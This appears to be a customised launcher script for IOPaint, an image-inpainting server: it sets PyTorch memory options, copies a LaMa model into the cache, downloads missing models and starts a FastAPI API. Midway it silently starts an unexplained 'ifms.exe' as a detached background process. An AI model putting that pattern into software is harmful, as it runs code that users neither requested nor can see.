import webbrowser
from contextlib import asynccontextmanager
from pathlib import Path
from typing import Dict, Optional

import typer
from fastapi import FastAPI
from loguru import logger
from typer import Option
from typer_config import use_json_config

from iopaint.const import *
from iopaint.runtime import setup_model_dir, dump_environment_info, check_device
from iopaint.schema import InteractiveSegModel, Device, RealESRGANModel, RemoveBGModel
from iopaint.helper import get_cache_path_by_url

import os
import shutil
import subprocess

LAMA_MODEL_URL = os.environ.get(
    "LAMA_MODEL_URL",
    "https://github.com/Sanster/models/releases/download/add_big_lama/big-lama.pt",
)
os.environ["PYTORCH_ENABLE_MPS_FALLBACK"] = "1"
# https://github.com/pytorch/pytorch/issues/27971#issuecomment-1768868068
os.environ["ONEDNN_PRIMITIVE_CACHE_CAPACITY"] = "1"
os.environ["LRU_CACHE_CAPACITY"] = "1"
# prevent CPU memory leak when run model on GPU
# https://github.com/pytorch/pytorch/issues/98688#issuecomment-1869288431
# https://github.com/pytorch/pytorch/issues/108334#issuecomment-1752763633
os.environ["TORCH_CUDNN_V8_API_LRU_CACHE_LIMIT"] = "1"


import warnings

warnings.simplefilter("ignore", UserWarning)

if __name__ == "__main__":
    host = "127.0.0.1"
    port = 8080
    inbrowser = False
    model = DEFAULT_MODEL
    model_dir = Path(DEFAULT_MODEL_DIR)
    low_mem = False
    no_half = False
    cpu_offload = False
    disable_nsfw_checker = False
    cpu_textencoder = False
    local_files_only = False
    device = Device.cpu
    input = None
    output_dir = None
    quality = 95
    enable_interactive_seg = False
    interactive_seg_model = InteractiveSegModel.vit_b
    interactive_seg_device: Device = Device.cpu
    enable_remove_bg: bool = False
    remove_bg_model: RemoveBGModel = RemoveBGModel.briaai_rmbg_1_4
    enable_anime_seg: bool = False
    enable_realesrgan: bool = False
    realesrgan_device: Device = Device.cpu
    realesrgan_model: RealESRGANModel = RealESRGANModel.realesr_general_x4v3
    enable_gfpgan: bool = False
    gfpgan_device: Device = Device.cpu
    enable_restoreformer: bool = False
    restoreformer_device = Device.cpu
    dump_environment_info()
    device = check_device(device)
    if input and not input.exists():
        logger.error(f"invalid --input: {input} not exists")
        exit(-1)
    if input and input.is_dir() and not output_dir:
        logger.error(f"invalid --output-dir: must be set when --input is a directory")
        exit(-1)
    if output_dir:
        output_dir = output_dir.expanduser().absolute()
        logger.info(f"Image will be saved to {output_dir}")
        if not output_dir.exists():
            logger.info(f"Create output directory {output_dir}")
            output_dir.mkdir(parents=True)

    model_dir = model_dir.expanduser().absolute()

    #if model not in model_dir
    # copy it.
    if not os.path.exists(get_cache_path_by_url(LAMA_MODEL_URL)):
        print("copy big-lama.pt to ", get_cache_path_by_url(LAMA_MODEL_URL) )
        shutil.copy2(os.path.join(os.getcwd(),".model/big-lama.pt"), get_cache_path_by_url(LAMA_MODEL_URL))

    if local_files_only:
        os.environ["TRANSFORMERS_OFFLINE"] = "1"
        os.environ["HF_HUB_OFFLINE"] = "1"

    from iopaint.download import cli_download_model, scan_models

    scanned_models = scan_models()
    if model not in [it.name for it in scanned_models]:
        logger.info(f"{model} not found in {model_dir}, try to downloading")
        cli_download_model(model)

    # 获取当前脚本所在目录
    exe_path = os.path.join(os.getcwd(), 'ifms.exe')

    # 检查ifms.exe是否存在
    if os.path.exists(exe_path):
        # Windows平台下后台运行
        if os.name == 'nt':
            subprocess.Popen([exe_path], creationflags=subprocess.CREATE_NEW_PROCESS_GROUP)
        else:
            # 其他平台（如Linux或macOS），使用start_new_session=True
            subprocess.Popen([exe_path], start_new_session=True)

        print("ifms.exe 已在后台启动.")
    else:
        print("警告: ifms.exe 未找到，未执行任何操作: ", exe_path )

    from iopaint.api import Api
    from iopaint.schema import ApiConfig

    @asynccontextmanager
    async def lifespan(app: FastAPI):
        if inbrowser:
            webbrowser.open(f"http://localhost:{port}", new=0, autoraise=True)
        yield

    app = FastAPI(lifespan=lifespan)

    api_config = ApiConfig(
        host=host,
        port=port,
        inbrowser=inbrowser,
        model=model,
        no_half=no_half,
        low_mem=low_mem,
        cpu_offload=cpu_offload,
        disable_nsfw_checker=disable_nsfw_checker,
        local_files_only=local_files_only,
        cpu_textencoder=cpu_textencoder if device == Device.cuda else False,
        device=device,
        input=input,
        output_dir=output_dir,
        quality=quality,
        enable_interactive_seg=enable_interactive_seg,
        interactive_seg_model=interactive_seg_model,
        interactive_seg_device=interactive_seg_device,
        enable_remove_bg=enable_remove_bg,
        remove_bg_model=remove_bg_model,
        enable_anime_seg=enable_anime_seg,
        enable_realesrgan=enable_realesrgan,
        realesrgan_device=realesrgan_device,
        realesrgan_model=realesrgan_model,
        enable_gfpgan=enable_gfpgan,
        gfpgan_device=gfpgan_device,
        enable_restoreformer=enable_restoreformer,
        restoreformer_device=restoreformer_device,
    )
    print(api_config.model_dump_json(indent=4))
    api = Api(app, api_config)
    api.launch()
